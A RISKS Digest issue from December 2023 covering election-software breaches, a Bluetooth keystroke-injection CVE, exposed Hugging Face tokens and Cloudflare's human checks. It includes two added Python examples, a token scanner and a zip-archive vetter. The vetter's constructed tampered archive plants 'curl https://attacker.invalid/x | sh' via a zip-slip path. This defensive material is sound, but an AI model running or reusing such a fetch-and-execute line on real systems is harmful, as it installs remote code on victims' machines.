From: risko@csl.sri.com (RISKS List Owner)
Newsgroups: comp.risks
Subject: Risks Digest 33.96
Date: 10 Dec 2023 00:07:59 -0000
Organization: PANIX Public Access Internet and UNIX, NYC
Message-ID: <CMM.0.90.4.1702166756.risko@chiron.csl.sri.com21185>

RISKS-LIST: Risks-Forum Digest Saturday 9 December 2023 Volume 33 : Issue 96

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, founder and still moderator

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/33.96>
The current issue can also be found at
<http://www.csl.sri.com/users/risko/risks.txt>

Contents:
Experts Warn of 'Serious Threats' from Election Equipment
Software Breaches (Christina A. Cassidy)
Woman enters MRI with concealed gun, to predictable results
(Gizmodo)
One Year in, it’s Clear the iPhone’s Satellite SOS Feature Is
Saving Lives (BackPacker)
Verizon fell for fake search warrant, gave victim's phone data to stalker
(Ars Technica)
Bluetooth Keyboard attack vector (Apple Insider)
Google calls Drive data loss *fixed*, locks forum threads saying otherwise
(Ars Technica)
Hugging Face API tokens exposed, major projects vulnerable
(The Register)
DC's public library computerized book index crippled, not by malware..
(danny burstein)
The big lie of millions of information security jobs (Ben Rothke)
U.S. indicts alleged Russian hackers for years-long cyber-espionage campaign
against Western countries (TechCrunch)
Unable to verify humanity (Cliff Kilby)
Ego, Fear and Money: How the AI Fuse Was Lit (The NYTimes)
Personal Information Can Be Accessed Through ChatGPT Queries (James Farrell)
Popular Retailers Accused Of Using AI To Illegally Record Customers (Patch)
Bruce Schneier on AI and Spying (via PGN)
I don't give a damn about "you" and AI (Lauren Weinstein)
Re: Guidelines for AI cybersecurity (David Parnas)
Re: Crypto Crashed and Everyone's In Jail. Investors Think It's Coming Back
Anyway. (Martin Ward)
Re: WeWork has failed, leaving damage in its wake (Henry Baker)
Re: PSA: Update Chrome browser now to avoid an exploit already in
Re: Outdated Password Practices are Widespread but so what
(John Levine)
Re: Meta/Facebook profiting from sale of counterfeit U.S. stamps
(John Levine)
Re: G7 and EU countries pitch guidelines (Bob Smith)
Abridged info on RISKS (comp.risks)

----------------------------------------------------------------------

Date: Wed, 6 Dec 2023 11:34:35 -0500 (EST)
From: ACM TechNews <technews-editor@acm.org>
Subject: Experts Warn of 'Serious Threats' from Election Equipment
Software Breaches (Christina A. Cassidy)

Christina A. Cassidy, *Associated Press*, 5 Dec 2023

A letter sent Monday by nearly two dozen computer scientists, election
security experts, and voter advocacy organizations to federal authorities
called for a federal probe and a risk assessment of voting machines used
throughout the U.S., saying software breaches have "urgent implications for
the 2024 election and beyond." According to the letter, the breaches
involved efforts to access voting system software in several states and
provide it to allies of former President Donald Trump as they sought to
overturn the results of the 2020 election. The letter stressed that
possession of voting system software could enable people to practice how to
meddle in the 2024 election, allowing them to identify vulnerabilities and
test potential attacks.

------------------------------

Date: Wed, 6 Dec 2023 14:55:28 -0800
From: Lauren Weinstein <lauren@vortex.com>
Subject: Woman enters MRI with concealed gun, to predictable results
(Gizmodo)

https://gizmodo.com/mri-machine-accidents-gun-shot-woman-butt-1851077446

A woman's medical exam turned into a literal pain in the butt, thanks to a
poorly placed firearm. An adverse event report sent to the Food and Drug
Administration earlier this year details an alleged incident where the woman
was shot in the right buttock by her own gun that was activated by a
magnetic resonance imaging (MRI) machine. Thankfully, the injury was
relatively mild and she recovered just fine.

The report was first filed
<https://www.accessdata.fda.gov/scripts/cdrh/cfdocs/cfmaude/detail.cfm?mdrfoi__id=17404241&pc=LNH&device_sequence_no=1>
in July by the woman's healthcare provider to the FDA’s Manufacturer and
User Facility Device Experience (MAUDE) database -- a voluntary reporting
system for adverse events tied to medical devices. But the incident appears
to have first been publicly unearthed last week by *The Messenger*.
<https://themessenger.com/health/mri-gun-shot-self-inflicted-injury-prevention>

------------------------------

Date: Fri, 8 Dec 2023 22:07:37 -0500
From: Monty Solomon <monty@roscom.com>
Subject: One Year in, it’s Clear the iPhone’s Satellite SOS Feature Is
Saving Lives (BackPacker)

When Apple introduced the ability to automatically call for help via
satellite in 2022, critics feared it would encourage hikers to be
reckless. But a year later, one of the United States' busiest search and
rescue outfits is praising it -- and other new safety tech from the company
-- as a "game changer."

https://www.backpacker.com/news-and-events/news/apple-iphone-satellite-sos-saving-hikers-lives/

------------------------------

Date: Fri, 8 Dec 2023 21:49:50 -0500
From: Monty Solomon <monty@roscom.com>
Subject: Verizon fell for fake search warrant, gave victim's
phone data to stalker (Ars Technica)

https://arstechnica.com/?p=1989794

------------------------------

Date: Fri, 8 Dec 2023 22:15:15 -0500
From: Monty Solomon <monty@roscom.com>
Subject: Bluetooth Keyboard attack vector (Apple Insider)

If you're using a Magic Keyboard, you've opened up an attack vector
https://appleinsider.com/articles/23/12/07/if-youre-using-a-magic-keyboard-youve-opened-up-an-attack-vector

CVE-2023-45866: Unauthenticated Bluetooth keystroke-injection in Android,
Linux, macOS and iOS
https://github.com/skysafe/reblog/tree/main/cve-2023-45866

------------------------------

Date: Fri, 8 Dec 2023 21:54:07 -0500
From: Monty Solomon <monty@roscom.com>
Subject: Google calls Drive data loss *fixed*, locks forum
threads saying otherwise (Ars Technica)

https://arstechnica.com/?p=1989435

------------------------------

Date: Tue, 5 Dec 2023 15:13:43 +0800
From: Li Gong <ligongsf@gmail.com>
Subject: Hugging Face API tokens exposed, major projects vulnerable
(The Register)

https://www.theregister.com/2023/12/04/exposed_hugging_face_api_tokens/
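
The Register story above is about tokens that ended up in public code and model
repositories. The following is an added example, not code from the digest, from
The Register, or from Hugging Face: a small scanner of the kind a pre-commit hook
or CI job would run over source text before it is pushed. It assumes (this is an
assumption, not something the article states) that Hugging Face user access
tokens have the shape `hf_` followed by 34 letters or digits; the sample source
file it scans is constructed for the example.

```python
import re
from typing import List, Tuple

# ASSUMPTION (not from the article): Hugging Face user access tokens look like
# "hf_" followed by 34 letters/digits. Adjust the pattern if the format changes.
# The lookarounds stop identifiers such as hf_hub_download from matching.
HF_TOKEN_RE = re.compile(r"(?<![A-Za-z0-9_])hf_[A-Za-z0-9]{34}(?![A-Za-z0-9_])")


def redact(token: str) -> str:
    """Keep just enough of the token to locate it in a report, never the whole secret."""
    return token[:6] + "..." + token[-4:]


def find_hf_tokens(text: str) -> List[Tuple[int, str]]:
    """Return (line number, redacted token) for each candidate token in text."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for match in HF_TOKEN_RE.finditer(line):
            hits.append((lineno, redact(match.group(0))))
    return hits


def scrub(text: str) -> str:
    """Replace every candidate token so the text is safe to log or paste into a ticket."""
    return HF_TOKEN_RE.sub("hf_<REDACTED>", text)


# Constructed sample of a file someone might commit by mistake (not a real token).
SAMPLE_SOURCE = """\
from huggingface_hub import hf_hub_download  # function name, not a token
HF_TOKEN = "hf_AbCdEfGhIjKlMnOpQrStUvWxYz01234567"  # constructed, line 2
path = hf_hub_download("org/model", "weights.bin", token=HF_TOKEN)
# a .env line pasted into a comment, also constructed:
# HUGGINGFACE_TOKEN=hf_ZyXwVuTsRqPoNmLkJiHgFeDcBa76543210
"""

if __name__ == "__main__":
    for lineno, shown in find_hf_tokens(SAMPLE_SOURCE):
        print(f"line {lineno}: possible Hugging Face token {shown}")
```

A scanner like this only catches the literal token shape; a leaked token that has
already been pushed must be revoked on the Hugging Face side regardless of how
quickly the commit is rewritten, since clones and mirrors keep the old history.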

------------------------------

Date: Mon, 4 Dec 2023 00:09:57 +0000 ()
From: danny burstein <dannyb@panix.com>
Subject: DC's public library computerized book index crippled,
not by malware

[From dclibrary.org's main web page]

Service Alert

Due to a contract conflict between two software vendors, our DC Public
Library app is currently experiencing functionality limitations,
particularly with the "Search the catalog" and "Popular Titles" features
located at the top. The vendors are working to resolve this issue as soon as
possible. The library's catalog can still be accessed via our website both
on mobile and on desktop, for your convenience.

https://www.dclibrary.org/

------------------------------

Date: Mon, 4 Dec 2023 09:31:37 -0500
From: Ben Rothke <brothke@gmail.com>
Subject: The big lie of millions of information security jobs

Based on non-empirical research, there is a notion that there are many
millions of unfilled information security jobs. The reality is that isn't
so.

These reports, created by organizations with a vested interest in those
numbers, create the situation where security boot camps are created to fill
these non-existent jobs.

While there are many open information security jobs, it's not in the
millions or even close to that.

------------------------------

Date: Thu, 7 Dec 2023 21:36:19 -0500
From: Monty Solomon <monty@roscom.com>
Subject: U.S. indicts alleged Russian hackers for years-long cyber
espionage campaign against Western countries (TechCrunch)

https://techcrunch.com/2023/12/07/us-indicts-alleged-russian-hackers-for-years-long-cyber-espionage-campaign-against-western-countries/

------------------------------

Date: Sat, 9 Dec 2023 14:52:16 -0500
From: Cliff Kilby <cliffjkilby@gmail.com>
Subject: Unable to verify humanity

The concept of verifying that a person is attempting to access a resource is
a useful concept for online companies. Scripts and bots can misbehave or be
intentionally directed to exhaust the resources of a server. It is not
unexpected that a company would want to limit the impact of these
activities. Historically, systems like CAPTCHAs and web application firewall
(WAF) session limiters have been used to provide load shedding for these
front end servers. A few years back, there was a study released that
CAPTCHAs were responsible for an inordinate amount of time wasting and
usability reports. CAPTCHA-less CAPTCHA services became popular and still
mostly do the same thing. None of these things are new.

What is new is the trend of CAPTCHA-less services preventing access to people
while still permitting access to scripts and bots. I have had to cancel
several online services recently due to the fact that CloudFlare does not
allow me to utilize their websites. My first reaction, as yours should be, is
"PEBKAC". A quick search for the phrase "cloudflare verify human loop" will
show that it's rather persistent, with issues going back to at least 2022.

My current environment is a Linux machine, with local DNS intercepts and a
curated upstream resolver. There are no DNS errors to be found. I have
disabled all the browser privacy features and yet I am unable to verify I am
human. The developer logs are helpfully cleared automatically by CloudFlare,
so that's difficult to intercept, but as best I can tell, I am no longer
human because I refuse to allow my web browser to use WebGL. The risks
associated with a browser getting generic access to a system level driver
(WebGL/Render, WASM, etc.) from unverified code (i.e., a webpage) are a hard
no.

CloudFlare has no such restriction about verifying code. They distribute
unsigned, unvalidated node.js code directly.
https://developers.cloudflare.com/pages/platform/known-issues. "Download
the delete-all-deployments.zip file by going to the following link:
https://pub-505c82ba1c844ba788b97b1ed9415e75
..<redacted>/delete-all-deployments.zip". I would have expected that the
codecov issue would have put a stop to "click and download this zip", as
should all corporate and private security training.
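
The complaint above is that a zip file handed out by a bare download link
arrives with nothing a recipient can check. The following is an added example,
not Cloudflare's code and not part of the digest, of the two checks a
practitioner would want before unpacking such an archive: pin it to a SHA-256
value obtained over a separate trusted channel (here assumed and derived from a
constructed sample; a vendor would publish it in signed release notes or a
signature file), and refuse archives whose member names would write outside the
extraction directory (a "zip slip" entry). The archives are built in memory for
the example, so nothing is downloaded.

```python
import hashlib
import hmac
import io
import posixpath
import zipfile
from typing import Dict, List


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def unsafe_members(zip_bytes: bytes) -> List[str]:
    """Names whose extraction would land outside the target directory (zip slip)."""
    bad = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            # Normalise "a/../../x" style paths and Windows separators, then look at
            # the first component: absolute paths, "..", and drive letters are out.
            norm = posixpath.normpath(name.replace("\\", "/"))
            first = norm.split("/", 1)[0]
            if norm.startswith("/") or first == ".." or ":" in first:
                bad.append(name)
    return bad


def vet_download(zip_bytes: bytes, expected_sha256: str) -> Dict[str, object]:
    """Verdict on an archive: pinned hash first, then a member-name check."""
    hash_ok = hmac.compare_digest(sha256_hex(zip_bytes), expected_sha256.lower())
    bad = unsafe_members(zip_bytes)
    return {"hash_ok": hash_ok, "unsafe_members": bad, "trusted": hash_ok and not bad}


def build_zip(members: Dict[str, bytes]) -> bytes:
    """Construct a small archive in memory with fixed timestamps (sample data only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in members.items():
            info = zipfile.ZipInfo(name, date_time=(2023, 12, 9, 0, 0, 0))
            zf.writestr(info, data)
    return buf.getvalue()


# Constructed stand-ins for a vendor-supplied archive and a tampered copy of it.
GOOD_ZIP = build_zip({"delete-all-deployments/run.js": b"console.log('cleanup');\n"})
TAMPERED_ZIP = build_zip({
    "delete-all-deployments/run.js": b"console.log('cleanup');\n",
    "../../.profile": b"curl https://attacker.invalid/x | sh\n",  # zip-slip entry
})
# ASSUMPTION: in practice this value comes from the vendor over a separate trusted
# channel (signed release notes, a detached signature). Here it is derived from
# GOOD_ZIP so the example runs offline.
PUBLISHED_SHA256 = sha256_hex(GOOD_ZIP)

if __name__ == "__main__":
    print("vendor archive:", vet_download(GOOD_ZIP, PUBLISHED_SHA256))
    print("tampered copy: ", vet_download(TAMPERED_ZIP, PUBLISHED_SHA256))
```

The hash check only helps if the expected value did not travel the same path as
the archive; a hash printed on the same page as the download link tells you
nothing about who controls that page. The member-name check matters because
plain `unzip` and `ZipFile.open()` by name do not sanitise paths the way
`extractall()` does.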

